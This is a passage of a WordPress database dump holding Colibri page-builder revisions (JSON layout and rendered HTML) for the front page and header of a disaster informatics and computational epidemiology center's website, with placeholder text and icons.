</div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:41:15','2022-02-16 15:41:15','',22,'https://gsudice.dataconn.net/?p=297',0,'revision','',0),(301,1,'2022-02-16 15:41:47','2022-02-16 15:41:47','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:41:47','2022-02-16 15:41:47','',168,'https://gsudice.dataconn.net/?p=301',0,'revision','',0),(302,1,'2022-02-16 15:41:47','2022-02-16 15:41:47','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:41:47','2022-02-16 15:41:47','',20,'https://gsudice.dataconn.net/?p=302',0,'revision','',0),(303,1,'2022-02-16 15:41:47','2022-02-16 15:41:47','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:41:47','2022-02-16 15:41:47','',23,'https://gsudice.dataconn.net/?p=303',0,'revision','',0),(304,1,'2022-02-16 15:41:47','2022-02-16 15:41:47','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image 